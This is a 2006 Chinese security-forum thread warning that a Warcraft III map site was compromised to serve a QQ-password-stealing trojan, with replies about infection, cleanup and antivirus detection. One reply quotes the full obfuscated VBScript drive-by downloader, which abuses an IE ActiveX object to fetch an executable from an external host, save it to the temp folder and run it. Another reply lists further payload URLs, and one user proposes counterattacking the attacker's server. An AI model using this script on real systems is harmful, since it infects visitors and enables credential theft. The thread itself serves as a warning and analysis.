首页
社区
课程
招聘
[注意]uuu9的主页被人挂马了,玩魔兽的小心了
发表于: 2006-11-9 09:07 7857

[注意]uuu9的主页被人挂马了,玩魔兽的小心了

2006-11-9 09:07
7857
被挂马的网址:http://war3.uuu9.com/ 和......这个网站是比较著名的魔兽地图,许多地方都有镜相连接,比如:http://games.sina.com.cn/z/war3/2/rpgmap/index_uuu9.shtml
木马名称:moi.com
木马性质:盗QQ,释放到临时目录,UPX压缩,IE插件,带驱动,而且是比较新或是重编译的,主流杀毒软件中只有最新的K8可以杀,其他的都没啥反映(严重抗议国内的杀毒软件反映迟钝)。
危害:这个挂上去应该有一段时间了,估计好多人中标了,BS网站管理员不作为,拉出去打屁屁。

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (22)
雪    币: 370
活跃值: (15)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
2
怎么才能中木马?浏览网页就ok吗?
我没中,郁闷
利用了ie什么漏洞?
2006-11-9 09:38
0
雪    币: 846
活跃值: (221)
能力值: (RANK:570 )
在线值:
发帖
回帖
粉丝
3
改出来的吧。。
2006-11-9 10:19
0
雪    币: 215
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
打开就中标了,学艺不精,中了以后才发现。这个文件是病毒体,没做准备不要运行,我重启了一次才删干净。
木马来自:http://www.wuswei.com/i/index.htm
<script language="VBScript">
    on error resume next
    Set dfile = document.createElement("ob"&QQ67112525ddd&"ject")
    dfile.setAttribute "cla"&Q52fg&"ssid", "clsid:B"&fgQ6725fg&"D96C556-"&fQ6ff&"65A3-11"&fg12525&"D0-983A-"&QQ67112525&"00C04F"&QQ67112525&"C29E36"
    Set http = dfile.CreateObject("Micro"&QQ67112525&"soft.X"&F4sdTRhh&"MLH"&"TTP","")
    a1="Ad"
    a2="odb."
    a3="Str"
    a4="eam"
    set strm = dfile.createobject(a1&QQ67112525&a2&F4sdTRhh&a3&a4,"")
    strm.type = 1
    http.Open "GET", "http://www.wuswei.com/i/admin.exe", False
    http.Send
    f1="Scri"
    f2="pting.Fil"
    f3="eSyst"
    f4="emObject"
    str13=f1&f2&f3&f4
    str12=str13
    set fso = dfile.createobject(str12,"")
    set temp = fso.GetSpecialFolder(2)
    filename= fso.BuildPath(temp,"moi.com")
    strm.open
    strm.write http.responseBody
    strm.savetofile filename,2
    strm.close
    b1="She"
    b2="ll."
    b3="Applic"
    b4="ation"
    set exc = dfile.createobject(b1&QQ67112525&b2&F4sdTRhh&b3&b4,"")
    str4="open"
    exc.ShellExecute filename,"","",str4,0
    </script>
上传的附件:
2006-11-9 11:06
0
雪    币: 67
活跃值: (66)
能力值: ( LV7,RANK:100 )
在线值:
发帖
回帖
粉丝
5
看不明白权限是怎么提升的...
2006-11-9 11:31
0
雪    币: 215
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
已经有人在UUU9的论坛里反映了,现在主页已经清除木马连接,看来只要在看雪发一帖,地球人就都知道了.
2006-11-9 14:23
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7

2006-11-9 15:06
0
雪    币: 339
活跃值: (1510)
能力值: ( LV13,RANK:970 )
在线值:
发帖
回帖
粉丝
8
偷魔?+QQ的??密瘁。办斤了:

http://www.ads183.com/qq/meizi/ou.asp

另外又下了:

http://www.meizi7472831.com/kanhai/229/1.exe
http://www.meizi7472831.com/kanhai/229/2.exe
http://www.meizi7472831.com/kanhai/229/3.exe
http://www.meizi7472831.com/kanhai/229/4.exe
http://www.meizi7472831.com/kanhai/229/5.exe
http://www.meizi7472831.com/kanhai/229/6.exe
http://www.meizi7472831.com/kanhai/229/7.exe
http://www.meizi7472831.com/kanhai/229/8.exe
http://www.meizi7472831.com/kanhai/229/9.exe

lz把下面呃一堆也一次重起搞定了?
2006-11-9 21:44
0
雪    币: 179
活跃值: (131)
能力值: ( LV12,RANK:290 )
在线值:
发帖
回帖
粉丝
9
NBW再写一个病毒分析~
2006-11-9 23:28
0
雪    币: 213
活跃值: (17)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
最初由 nbw 发布
偷魔?+QQ的??密瘁。办斤了:

http://www.ads183.com/qq/meizi/ou.asp

另外又下了:
........


攻击它把,做个自己发送密码的,发送到他的数据库暴掉为止
2006-11-10 08:01
0
雪    币: 215
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
最初由 nbw 发布
偷魔?+QQ的??密瘁。办斤了:

http://www.ads183.com/qq/meizi/ou.asp

另外又下了:
........

当我发现中毒以后立刻断网了,然后在少于10秒内杀掉了它的进程,这段时间内仅仅下了3个文件,还没来得及执行.
2006-11-10 08:08
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
12
驱网页挂马了:
detected: Trojan program Trojan-Downloader.VBS.Small.av        Script: http://bbs.driverdevelop.com/[1]
2006-11-10 08:50
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
hao!!!!!!!!!!!!!!!
2006-11-10 08:55
0
雪    币: 339
活跃值: (1510)
能力值: ( LV13,RANK:970 )
在线值:
发帖
回帖
粉丝
14
最初由 q3 watcher 发布
当我发现中毒以后立刻断网了,然后在少于10秒内杀掉了它的进程,这段时间内仅仅下了3个文件,还没来得及执行.


病毒?放的dll注入到所有咄程中,自身文件自?除了,?有咄程阿。看?施主中毒钊深啊。
2006-11-10 10:54
0
雪    币: 215
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
15
RUNDLL32,此时会使木马客星退出,但不幸的是注入被报警了,要不我咋知道的.之后我检查了所有新建文件,启动,服务,插件,驱动,才确认没问题的.我在学校的机器经常被中木马,我真是不理解,我的机器上又没啥好东西,QQ是垃圾号,游戏帐号里也没钱,未啥老是中毒哪?值得研究.
2006-11-10 11:08
0
雪    币: 339
活跃值: (1510)
能力值: ( LV13,RANK:970 )
在线值:
发帖
回帖
粉丝
16
无耻啊无耻,我远程看了一下,你的确中毒了中毒了r
2006-11-10 18:23
0
雪    币: 277
活跃值: (312)
能力值: ( LV9,RANK:330 )
在线值:
发帖
回帖
粉丝
17
还是卡巴厉害,附件还没下载就查出来了。
卡巴斯基反病毒6.0
The requested URL http://bbs.pediy.com/attachment.php?s=&attachmentid=3343 is infected with Trojan-PSW.Win32.QQPass.pz virus
2006-11-10 20:49
0
雪    币: 238
活跃值: (12)
能力值: ( LV9,RANK:210 )
在线值:
发帖
回帖
粉丝
18
原来是这个东西,之前在百度搜索东西,上一个国内网站就中招了,一大堆东西删除不干净,IE缓存和临时目录中都有,删了一边另一边又来了,最后只好ghost之前的windows
2006-11-10 21:01
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
19
nbw确实厉害小弟我好身佩服
2006-11-10 21:39
0
雪    币: 200
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
20
强...
2006-11-11 08:02
0
雪    币: 215
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
21
最初由 nbw 发布
无耻啊无耻,我远程看了一下,你的确中毒了中毒了r

远程看了一下?怎么看见的?招,是不是你是指导挂的马.
2006-11-11 08:16
0
雪    币: 82
活跃值: (516)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
22
为什么都中病毒呢?
这些都是利用系统的漏洞来下载的!
难道各位都不爱打系统补丁嘛   
2006-11-11 10:56
0
雪    币: 206
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
23
那个老漏洞了06014据说效果很好
2006-11-11 18:16
0
游客
登录 | 注册 方可回帖
返回
//